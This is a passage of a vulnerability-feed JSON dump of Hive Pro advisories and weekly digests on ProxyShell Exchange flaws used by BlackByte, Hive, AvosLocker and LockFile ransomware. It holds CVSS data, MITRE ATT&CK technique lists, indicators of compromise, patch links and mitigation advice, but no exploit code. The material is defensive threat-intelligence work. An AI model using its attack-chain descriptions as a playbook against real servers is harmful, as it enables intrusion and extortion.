"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-07T15:20:43", "description": "#### THREAT LEVEL: Red.\n\n \n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/12/BlackByte-ransomware-exploits-Microsoft-Servers-ProxyShell-vulnerabilities_TA202155.pdf>)\n\nBlackByte ransomware is targeting organizations with unpatched ProxyShell vulnerabilities. Proxy Shell was addressed by hive pro threat researcher in the previous [advisory](<https://www.hivepro.com/proxyshell-and-petitpotam-exploits-weaponized-by-lockfile-ransomware-group/>) released on August 24.\n\nProxyShell is a combination of three flaws in Microsoft Exchange:\n\nCVE-2021-34473 Pre-auth path confusion vulnerability to bypass access control. \nCVE-2021-34523 Privilege escalation vulnerability in the Exchange PowerShell backend. \nCVE-2021-31207 Post-auth remote code execution via arbitrary file write.\n\nThese security flaws are used together by threat actors to perform unauthenticated, remote code execution on vulnerable servers. After exploiting these vulnerabilities, the threat actors then install web shells, coin miners, ransomwares or backdoors on the servers. Attackers then use this web shell to deploy cobalt strike beacon into Windows Update Agent and get the credentials for a service account on compromised servers. The actor then installs Anydesk to gain control of the system and do lateral movement in the organization network. Post exploitation, attackers carry on with using Cobalt Strike to execute the Blackbyte ransomware and encrypt the data.\n\nAffected organizations can decrypt their files using a free decryption tool written by [Trustwave](<https://github.com/SpiderLabs/BlackByteDecryptor>). Users can patch their server for ProxyShell vulnerabilities using the link down below.\n\n**Techniques used by Blackbyte ransomware are :**\n\nT1505.003 Server Software Component: Web Shell \nT1055 Process Injection \nT1059.001 Command and Scripting Interpreter: PowerShell \nT1595.002 Active Scanning: Vulnerability Scanning \nT1027 Obfuscated Files of Information \nT1490 Inhibit System Recovery \nT1112 Modify Registry \nT1562.001 Impair Defenses: Disable or Modify Tools \nT1562.004 Impair Defenses: Disable or Modify System Firewall \nT1018 Remote System Discovery \nT1016 System Network Configuration Discovery \nT1070.004 Indicator Removal on Host: File Deletion \nT1560.001 Archive Collected Data: Archive via Utility\n\n[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F12%2FMicrosoft-could-not-patch-this-vulnerability-yet-again_TA202153.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\n \n\n#### Vulnerability Details\n\n \n\n\n\n \n\n#### Actor Detail\n\n \n\n\n\n \n\n#### Indicators of Compromise(IoCs)\n\n \n\n\n\n \n\n#### Patch Link\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>\n\n \n\n#### References\n\n<https://redcanary.com/blog/blackbyte-ransomware/>\n\n<https://www.techtarget.com/searchsecurity/news/252510334/BlackByte-ransomware-attacks-exploiting-ProxyShell-flaws>\n\n<https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-blackbyte-ransomware/>\n\n<https://www.stellarinfo.com/blog/blackbyte-ransomware-attacks-exchange-servers-with-proxyshell-flaws/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-07T13:24:49", "type": "hivepro", "title": "BlackByte ransomware exploits Microsoft Servers ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-12-07T13:24:49", "id": "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "href": "https://www.hivepro.com/blackbyte-ransomware-exploits-microsoft-servers-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-22T15:39:16", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Hive Ransomware has been active since its discovery in June 2021, and it is constantly deploying different backdoors, including the Cobalt Strike beacon, on Microsoft Exchange servers that are vulnerable to ProxyShell (CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523) security flaws. The threat actors then conduct network reconnaissance, obtain admin account credentials, and exfiltrate valuable data before deploying the file-encrypting payload. Hive and their affiliates access their victims' networks by a variety of methods, including phishing emails with malicious attachments, compromised VPN passwords, and exploiting weaknesses on external-facing assets. Furthermore, Hive leaves a plain-text ransom letter threatening to disclose the victim's data on the TOR website 'HiveLeaks' if the victim does not meet the attacker's terms. The Organizations can mitigate the risk by following the recommendations: \u2022Use multi-factor authentication. \u2022Keep all operating systems and software up to date. \u2022Remove unnecessary access to administrative shares. \u2022Maintain offline backups of data and Ensure all backup data is encrypted and immutable. \u2022Enable protected files in the Windows Operating System for critical files. The MITRE ATT&CK TTPs used by Hive Ransomware are: TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and ControlTA0010: Exfiltration TA0040: ImpactT1190: Exploit Public-Facing ApplicationT1566: PhishingT1566.001: Spear-phishing attachmentT1106: Native APIT1204: User ExecutionT1204.002: Malicious FileT1059: Command and Scripting InterpreterT1059.001: PowerShellT1059.003: Windows Command ShellT1053: Scheduled Task/JobT1053.005: Scheduled TaskT1047: Windows Management InstrumentT1136: Create AccountT1136.002: Domain AccountT1078: Valid AccountsT1078.002: Domain AccountsT1053: Boot or logon autostart executionT1068: Exploitation for Privilege EscalationT1140: Deobfuscate/Decode Files or InformationT1070: Indicator Removal on Host T1070.001: Clear Windows Event LogsT1562: Impair DefensesT1562.001: Disable or Modify ToolsT1003: OS Credential DumpingT1003.005: Cached Domain Credentials|T1018: Remote System DiscoveryT1021: Remote ServicesT1021.001: Remote Desktop ProtocolT1021.002: SMB/Windows admin sharesT1021.006: Windows Remote ManagementT1083: File and directory discoveryT1057: Process discoveryT1063: Security software discoveryT1049: System Network Connections DiscoveryT1135: Network Share DiscoveryT1071: Application Layer ProtocolT1071.001: Web ProtocolsT1570: Lateral tool transfer1486: Data Encrypted for ImpactT1005: Data from local systemT1560: Archive Collected DataT1560.001: Archive via UtilityT1105: Ingress Tool TransferT1567: Exfiltration over web service Actor Details Vulnerability Details Indicators of Compromise (IoCs) Recent Breaches https://millsgrouponline.com/ https://www.fcch.com/ https://www.konradin.de/de/ https://www.pollmann.at/en https://www.emilfrey.ch/de https://rte.com.br/ https://www.friedrich.com/ https://powerhouse1.com/ https://www.hshi.co.kr/eng/ https://www.eurocoininteractive.nl/ https://www.itsinfocom.com/ https://www.pan-energy.com/ https://nsminc.com/ https://www.ucsiuniversity.edu.my/ https://kemlu.go.id/portal/id Patch Links https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207 References https://www.varonis.com/blog/hive-ransomware-analysis https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T14:34:47", "type": "hivepro", "title": "Hive Ransomware targets organizations with ProxyShell exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-22T14:34:47", "id": "HIVEPRO:F2305684A25C735549865536AA4254BF", "href": "https://www.hivepro.com/hive-ransomware-targets-organizations-with-proxyshell-exploit/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:24:49", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Federal Bureau of Investigation and Cybersecurity and Infrastructure Security Agency released threat advisories on AvosLocker Ransomware. It is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations in critical infrastructure sectors such as financial services, manufacturing plants, and government facilities in countries such as the United States, Saudi Arabia, the United Kingdom, Germany, Spain, and the United Arab Emirates, among others. After it's affiliates infect targets, AvosLocker claims to handle ransom negotiations, as well as the publishing and hosting of exfiltrated victim data. The AvosLocker ransomware is a multi-threaded C++ Windows executable that operates as a console application and displays a log of actions performed on victim computers. For the delivery of the ransomware payload, the attackers use spam email campaigns as the initial infection vector. The threat actors exploits Proxy Shell vulnerabilities CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, as well as CVE-2021-26855 to gain access to victim\u2019s machine and then they deploy Mimikatz to steal passwords. Furthermore, threat actors can use the detected credentials to get RDP access to the domain controller and then exfiltrate data from the compromised machine. Finally, the attacker installs AvosLocker ransomware on the victim's computer and then encrypts the victim's documents and files with the ".avos" extension. The actor then leaves a ransom letter in each directory named "GET YOUR FILES BACK.txt" with a link to an AvosLocker .onion payment site. The Organizations can mitigate the risk by following the recommendations: \u2022Keep all operating systems and software up to date. \u2022Remove unnecessary access to administrative shares. \u2022Maintain offline backups of data and Ensure all backup data is encrypted and immutable. The MITRE TTPs commonly used by Avoslocker are: TA0001: Initial AccessTA0002: ExecutionTA0007: DiscoveryTA0040: ImpactT1566: PhishingT1204: User ExecutionT1082: System Information DiscoveryT1490: Inhibit System RecoveryT1489: Service StopT1486: Data Encrypted for Impact Actor Detail Vulnerability Details Indicators of Compromise (IoCs) Patches https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 Recent Breaches https://www.unical.com/ https://www.paccity.net/ https://www.gigabyte.com/ Reference https://www.cisa.gov/uscert/ncas/current-activity/2022/03/22/fbi-and-fincen-release-advisory-avoslocker-ransomware", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-24T06:30:44", "type": "hivepro", "title": "AvosLocker Ransomware group has targeted 50+ Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-24T06:30:44", "id": "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "href": "https://www.hivepro.com/avoslocker-ransomware-group-has-targeted-50-organizations-worldwide/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-24T12:00:56", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202131.pdf>)[.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202130.pdf>)\n\nLockFile, a new ransomware gang, has been active since last week. LockFile began by using a publicly disclosed PetitPotam exploit (CVE-2021-36942) to compromise Windows Domain Controllers earlier this week. Using ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207), they've now infiltrated many Microsoft Exchange Servers . The origins of this gang are most likely China. This gang used a similar ransomware note as of LokiBot and is been linked to Conti ransomware due to the email id provided (contact@contipauper[.]com). HivePro Threat Research team advises everyone to patch the vulnerabilities to prevent an attack.\n\n#### Vulnerability Details\n\n\n\n#### Actor Details\n\n**Name** | **Target Locations** | **Target Sectors** | \n---|---|---|--- \nLockFile Ransomware | United States of America and Asia | Manufacturing, financial services, engineering, legal, business services, and travel and tourism sectors | \n \n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIP Address | 209.14.0.234 \nSHA-2 Hash | ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291 \ncafe54e85c539671c94abdeb4b8adbef3bde8655006003088760d04a86b5f915 \n36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9 \n5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f \n1091643890918175dc751538043ea0743618ec7a5a9801878554970036524b75 \n2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a \n7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd \nc020d16902bd5405d57ee4973eb25797087086e4f8079fac0fd8420c716ad153 \na926fe9fc32e645bdde9656470c7cd005b21590cda222f72daf854de9ffc4fe0 \n368756bbcaba9563e1eef2ed2ce59046fb8e69fb305d50a6232b62690d33f690 \nd030d11482380ebf95aea030f308ac0e1cd091c673c7846c61c625bdf11e5c3a \na0066b855dc93cf88f29158c9ffbbdca886a5d6642cbcb9e71e5c759ffe147f8 \n \n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>\n\n#### References\n\n<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>\n\n<https://www.bleepingcomputer.com/news/security/lockfile-ransomware-uses-petitpotam-attack-to-hijack-windows-domains/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-24T10:35:48", "type": "hivepro", "title": "ProxyShell and PetitPotam exploits weaponized by LockFile Ransomware Group", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-36942"], "modified": "2021-08-24T10:35:48", "id": "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "href": "https://www.hivepro.com/proxyshell-and-petitpotam-exploits-weaponized-by-lockfile-ransomware-group/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-27T15:34:57", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 430 5 2 Worldwide 17 46 The fourth week of April 2022 witnessed the discovery of 430 vulnerabilities out of which 5 gained the attention of Threat Actors and security researchers worldwide. Among these 5, there was 1 zero-day, and 1 vulnerability that was awaiting analysis on the National Vulnerability Database (NVD). Hive Pro Threat Research Team has curated a list of 5 CVEs that require immediate action. Further, we also observed Two Threat Actor groups being highly active in the last week. Lazarus, a North Korea threat actor group popular for financial crime and gain, was observed targeting blockchain technology and the cryptocurrency industry using a new malware TraderTraitor and Hive ransomware group was seen using the ProxyShell vulnerabilities to target organizations all around the world. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34473 CVE-2021-34523 CVE-2021-31207 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207 CVE-2022-0540 https://www.atlassian.com/software/jira/core/download https://www.atlassian.com/software/jira/update CVE-2022-29072* Not Available Active Actors: Icon Name Origin Motive Lazarus Group (APT38, BlueNoroff, and Stardust Chollima) North Korea Financial crime and gain Hive Ransomware Group Unknown Financial crime and gain Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1588: Obtain Capabilities T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1136: Create Account T1134: Access Token Manipulation T1134: Access Token Manipulation T1110: Brute Force T1083: File and Directory Discovery T1570: Lateral Tool Transfer T1560: Archive Collected Data T1071: Application Layer Protocol T1567: Exfiltration Over Web Service T1486: Data Encrypted for Impact T1588.005: Exploits T1566: Phishing T1059.007: JavaScript T1136.002: Domain Account T1543: Create or Modify System Process T1140: Deobfuscate/Decode Files or Information T1003: OS Credential Dumping T1135: Network Share Discovery T1021: Remote Services T1560.001: Archive via Utility T1071.001: Web Protocols T1496: Resource Hijacking T1588.006: Vulnerabilities T1566.001: Spearphishing Attachment T1059.001: PowerShell T1053: Scheduled Task/Job T1068: Exploitation for Privilege Escalation T1562: Impair Defenses T1003.005: Cached Domain Credentials T1057: Process Discovery T1021.001: Remote Desktop Protocol T1005: Data from Local System T1105: Ingress Tool Transfer T1566.002: Spearphishing Link T1059.003: Windows Command Shell T1053.005: Scheduled Task T1053: Scheduled Task/Job T1562.001: Disable or Modify Tools T1018: Remote System Discovery T1021.002: SMB/Windows Admin Shares T1113: Screen Capture T1078: Valid Accounts T1106: Native API T1078: Valid Accounts T1053.005: Scheduled Task T1070: Indicator Removal on Host T1518: Software Discovery T1021.006: Windows Remote Management T1078.002: Domain Accounts T1053: Scheduled Task/Job T1078.002: Domain Accounts T1078: Valid Accounts T1553: Subvert Trust Controls T1518.001: Security Software Discovery T1053.005: Scheduled Task T1078.002: Domain Accounts T1078: Valid Accounts T1049: System Network Connections Discovery T1204: User Execution T1078.002: Domain Accounts T1204.002: Malicious File T1047: Windows Management Instrumentation Threat Advisories: Bypass Authentication vulnerability in Atlassian Jira Seraph Hive Ransomware targets organizations with ProxyShell exploit Lazarus is back, targeting organizations with cryptocurrency thefts via TraderTraitor malware What will be the consequence of this disputed vulnerability in 7-ZIP?", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T12:44:38", "type": "hivepro", "title": "Weekly Threat Digest: 18 \u2013 24 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-0540", "CVE-2022-29072"], "modified": "2022-04-27T12:44:38", "id": "HIVEPRO:09525E3475AC1C5F429611A90182E82F", "href": "https://www.hivepro.com/weekly-threat-digest-18-24-april-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T07:42:21", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 340 10 5 53 24 84 The fourth week of March 2022 witnessed the discovery of 340 vulnerabilities out of which 10 gained the attention of Threat Actors and security researchers worldwide. Among these 10, there was 1 which is undergoing reanalysis, and 2 were not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 10 CVEs that require immediate action. Furthermore, we also observed five threat actor groups being highly active in the last week. The Lapsus$, a new extortion threat actor group had attacked popular organizations such as Brazilian Ministry of Health, NVIDIA, Samsung, Vodafone, Ubisoft, Octa, and Microsoft for data theft and destruction, was observed using the Redline info-stealer. Additionally, North Korean state hackers known as Lazarus group, was exploiting the zero-day vulnerability in Google Chrome's web browser (CVE-2022-0609). AvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations is currently exploiting Proxy Shell vulnerabilities (CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, CVE-2021-26855). The threat actor APT35 aka Magic Hound, an Iranian-backed threat group is exploiting the Proxy Shell vulnerabilities to attack organizations across the globe. Another South Korean APT group DarkHotel was targeting the hospitality industry in China. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34484 CVE-2022-21919 https://central.0patch.com/auth/login CVE-2022-0609* CVE-2022-1096* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2021-31206 CVE-2021-31207 CVE-2021-34523 CVE-2021-34473 CVE-2021-26855 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 CVE-2022-0543 https://security-tracker.debian.org/tracker/CVE-2022-0543 Active Actors: Icon Name Origin Motive APT 35 (Magic Hound, Cobalt Illusion, Charming Kitten, TEMP.Beanie, Timberworm, Tarh Andishan, TA453, ITG18, Phosphorus, Newscaster) Iran Information theft and espionage AvosLocker Unknown Ecrime, Information theft, and Financial gain Lazarus Group (Labyrinth Chollima, Group 77, Hastati Group, Whois Hacking Team, NewRomanic Cyber Army Team, Zinc, Hidden Cobra, Appleworm, APT-C-26, ATK 3, SectorA01, ITG03) North Korea Information theft and espionage, Sabotage and destruction, Financial crime Lapsus$ (DEV-0537) Unknown Data theft and Destruction DarkHotel (APT-C-06, SIG25, Dubnium, Fallout Team, Shadow Crane, CTG-1948, Tungsten Bridge, ATK 52, Higaisa, TAPT-02, Luder) South Korea Information theft and espionage Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1583: Acquire Infrastructure T1189: Drive-by Compromise T1059: Command and Scripting Interpreter T1098: Account Manipulation T1548: Abuse Elevation Control Mechanism T1548: Abuse Elevation Control Mechanism T1110: Brute Force T1010: Application Window Discovery T1021: Remote Services T1560: Archive Collected Data T1071: Application Layer Protocol T1048: Exfiltration Over Alternative Protocol T1485: Data Destruction T1583.001: Domains T1190: Exploit Public-Facing Application T1059.001: PowerShell T1547: Boot or Logon Autostart Execution T1134: Access Token Manipulation T1134: Access Token Manipulation T1110.003: Password Spraying T1083: File and Directory Discovery T1021.001: Remote Desktop Protocol T1560.003: Archive via Custom Method T1071.001: Web Protocols T1048.003: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol T1486: Data Encrypted for Impact T1583.006: Web Services T1133: External Remote Services T1059.005: Visual Basic T1547.006: Kernel Modules and Extensions T1134.002: Create Process with Token T1134.002: Create Process with Token T1056: Input Capture T1120: Peripheral Device Discovery T1021.002: SMB/Windows Admin Shares T1560.002: Archive via Library T1132: Data Encoding T1041: Exfiltration Over C2 Channel T1491: Defacement T1587: Develop Capabilities T1566: Phishing T1059.004: Unix Shell T1547.001: Registry Run Keys / Startup Folder T1547: Boot or Logon Autostart Execution T1564: Hide Artifacts T1056.004: Credential API Hooking T1057: Process Discovery T1021.004: SSH T1213: Data from Information Repositories T1132.001: Standard Encoding T1537: Transfer Data to Cloud Account T1491.001: Internal Defacement T1587.001: Malware T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1547.009: Shortcut Modification T1547.006: Kernel Modules and Extensions T1564.001: Hidden Files and Directories T1056.001: Keylogging T1012: Query Registry T1005: Data from Local System T1001: Data Obfuscation T1561: Disk Wipe T1588: Obtain Capabilities T1199: Trusted Relationship T1203: Exploitation for Client Execution T1543: Create or Modify System Process T1547.001: Registry Run Keys / Startup Folder T1562: Impair Defenses T1003: OS Credential Dumping T1082: System Information Discovery T1074: Data Staged T1001.003: Protocol Impersonation T1561.001: Disk Content Wipe T1588.004: Digital Certificates T1078: Valid Accounts T1106: Native API T1543.003: Windows Service T1547.009: Shortcut Modification T1562.004: Disable or Modify System Firewall T1111: Two-Factor Authentication Interception T1016: System Network Configuration Discovery T1074.001: Local Data Staging T1573: Encrypted Channel T1561.002: Disk Structure Wipe T1588.006: Vulnerabilities T1053: Scheduled Task/Job T1133: External Remote Services T1543: Create or Modify System Process T1562.001: Disable or Modify Tools T1552: Unsecured Credentials T1033: System Owner/User Discovery T1056: Input Capture T1573.001: Symmetric Cryptography T1490: Inhibit System Recovery T1204: User Execution T1137: Office Application Startup T1543.003: Windows Service T1070: Indicator Removal on Host T1124: System Time Discovery T1056.004: Credential API Hooking T1008: Fallback Channels T1489: Service Stop T1204.002: Malicious File T1542: Pre-OS Boot T1068: Exploitation for Privilege Escalation T1070.004: File Deletion T1056.001: Keylogging T1105: Ingress Tool Transfer T1529: System Shutdown/Reboot T1047: Windows Management Instrumentation T1542.003: Bootkit T1055: Process Injection T1070.006: Timestomp T1571: Non-Standard Port T1053: Scheduled Task/Job T1055.001: Dynamic-link Library Injection T1036: Masquerading T1090: Proxy T1505: Server Software Component T1053: Scheduled Task/Job T1036.005: Match Legitimate Name or Location T1090.002: External Proxy T1505.003: Web Shell T1078: Valid Accounts T1027: Obfuscated Files or Information T1078: Valid Accounts T1027.006: HTML Smuggling T1027.002: Software Packing T1542: Pre-OS Boot T1542.003: Bootkit T1055: Process Injection T1055.001: Dynamic-link Library Injection T1218: Signed Binary Proxy Execution T1218.001: Compiled HTML File T1078: Valid Accounts T1497: Virtualization/Sandbox Evasion Threat Advisories: Microsoft\u2019s privilege escalation vulnerability that refuses to go away Google Chrome\u2019s second zero-day in 2022 Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities AvosLocker Ransomware group has targeted 50+ Organizations Worldwide North Korean 